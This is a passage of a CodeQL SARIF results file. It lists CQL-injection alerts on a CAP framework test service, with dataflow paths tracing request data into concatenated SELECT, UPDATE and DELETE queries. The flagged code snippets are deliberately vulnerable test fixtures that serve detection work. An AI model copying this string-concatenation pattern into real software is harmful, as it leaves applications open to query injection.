id)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":145,"startColumn":7,"endColumn":58}},"message":{"text":"await S ... \" + id)"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":143,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":143,"startColumn":22,"endColumn":30}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":145,"startColumn":7,"endColumn":58}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":151,"startColumn":13,"endColumn":58}}}],"partialFingerprints":{"primaryLocationLineHash":"39e9cbf3cbd9ae3c:1","primaryLocationStartColumnFingerprint":"6"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":149,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":149,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":149,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":151,"startColumn":55,"endColumn":57}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":151,"startColumn":47,"endColumn":57}},"message":{"text":"`ID=` + id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":151,"startColumn":13,"endColumn":58}},"message":{"text":"SELECT. ... ` + id)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":151,"startColumn":7,"endColumn":58}},"message":{"text":"await S ... ` + id)"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":149,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":149,"startColumn":22,"endColumn":30}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":151,"startColumn":7,"endColumn":58}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":157,"startColumn":13,"endColumn":58}}}],"partialFingerprints":{"primaryLocationLineHash":"b86271478f0d53f6:1","primaryLocationStartColumnFingerprint":"6"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":155,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":155,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":155,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":157,"startColumn":53,"endColumn":55}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":157,"startColumn":47,"endColumn":57}},"message":{"text":"`ID=${id}`"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":157,"startColumn":13,"endColumn":58}},"message":{"text":"SELECT. ... ${id}`)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":157,"startColumn":7,"endColumn":58}},"message":{"text":"await S ... ${id}`)"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":155,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":155,"startColumn":22,"endColumn":30}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":157,"startColumn":7,"endColumn":58}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":187,"startColumn":13,"endColumn":88}}}],"partialFingerprints":{"primaryLocationLineHash":"12cb305ba21e438f:1","primaryLocationStartColumnFingerprint":"6"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":185,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":185,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":185,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":187,"startColumn":66,"endColumn":68}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":187,"startColumn":47,"endColumn":68}},"message":{"text":"\"col1 = ...  \" + id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":187,"startColumn":13,"endColumn":88}},"message":{"text":"UPDATE. ... \" + id)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":187,"startColumn":7,"endColumn":88}},"message":{"text":"await U ... \" + id)"}}}]}]},{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":185,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":185,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":185,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":187,"startColumn":85,"endColumn":87}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":187,"startColumn":76,"endColumn":87}},"message":{"text":"\"ID =\" + id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":187,"startColumn":13,"endColumn":88}},"message":{"text":"UPDATE. ... \" + id)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":187,"startColumn":7,"endColumn":88}},"message":{"text":"await U ... \" + id)"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":185,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":185,"startColumn":22,"endColumn":30}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":187,"startColumn":7,"endColumn":88}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":193,"startColumn":13,"endColumn":88}}}],"partialFingerprints":{"primaryLocationLineHash":"16a5323b901d361b:1","primaryLocationStartColumnFingerprint":"6"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":191,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":191,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":191,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":193,"startColumn":66,"endColumn":68}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":193,"startColumn":47,"endColumn":68}},"message":{"text":"\"col1 = ...  \" + id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":193,"startColumn":13,"endColumn":88}},"message":{"text":"UPDATE. ... ` + id)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":193,"startColumn":7,"endColumn":88}},"message":{"text":"await U ... ` + id)"}}}]}]},{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":191,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":191,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":191,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":193,"startColumn":85,"endColumn":87}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":193,"startColumn":76,"endColumn":87}},"message":{"text":"`ID =` + id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":193,"startColumn":13,"endColumn":88}},"message":{"text":"UPDATE. ... ` + id)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":193,"startColumn":7,"endColumn":88}},"message":{"text":"await U ... ` + id)"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":191,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":191,"startColumn":22,"endColumn":30}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":193,"startColumn":7,"endColumn":88}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":199,"startColumn":13,"endColumn":89}}}],"partialFingerprints":{"primaryLocationLineHash":"ec3b26f51764a997:1","primaryLocationStartColumnFingerprint":"6"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":197,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":197,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":197,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":199,"startColumn":66,"endColumn":68}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":199,"startColumn":47,"endColumn":68}},"message":{"text":"\"col1 = ...  \" + id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":199,"startColumn":13,"endColumn":89}},"message":{"text":"UPDATE. ... ${id}`)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":199,"startColumn":7,"endColumn":89}},"message":{"text":"await U ... ${id}`)"}}}]}]},{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":197,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":197,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":197,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":199,"startColumn":84,"endColumn":86}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":199,"startColumn":76,"endColumn":88}},"message":{"text":"`ID = ${id}`"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":199,"startColumn":13,"endColumn":89}},"message":{"text":"UPDATE. ... ${id}`)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":199,"startColumn":7,"endColumn":89}},"message":{"text":"await U ... ${id}`)"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":197,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":197,"startColumn":22,"endColumn":30}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":199,"startColumn":7,"endColumn":89}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":205,"startColumn":13,"endColumn":87}}}],"partialFingerprints":{"primaryLocationLineHash":"1ab4a8658ea07927:1","primaryLocationStartColumnFingerprint":"6"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":203,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":203,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":203,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":205,"startColumn":66,"endColumn":68}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":205,"startColumn":47,"endColumn":68}},"message":{"text":"\"col1 = ...  \" + id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":205,"startColumn":13,"endColumn":87}},"message":{"text":"UPDATE. ...  ${id}`"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":205,"startColumn":7,"endColumn":87}},"message":{"text":"await U ...  ${id}`"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":203,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":203,"startColumn":22,"endColumn":30}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":205,"startColumn":7,"endColumn":87}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":229,"startColumn":13,"endColumn":59}}}],"partialFingerprints":{"primaryLocationLineHash":"c191f9b82574b477:1","primaryLocationStartColumnFingerprint":"6"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":227,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":227,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":227,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":229,"startColumn":56,"endColumn":58}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":229,"startColumn":47,"endColumn":58}},"message":{"text":"\"ID =\" + id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":229,"startColumn":13,"endColumn":59}},"message":{"text":"DELETE. ... \" + id)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":229,"startColumn":7,"endColumn":59}},"message":{"text":"await D ... \" + id)"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":227,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":227,"startColumn":22,"endColumn":30}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":229,"startColumn":7,"endColumn":59}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":235,"startColumn":13,"endColumn":59}}}],"partialFingerprints":{"primaryLocationLineHash":"28ec6e53085bb293:1","primaryLocationStartColumnFingerprint":"6"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":233,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":233,"startColumn":13,"endColumn":19}},"message":{"text":"{ id 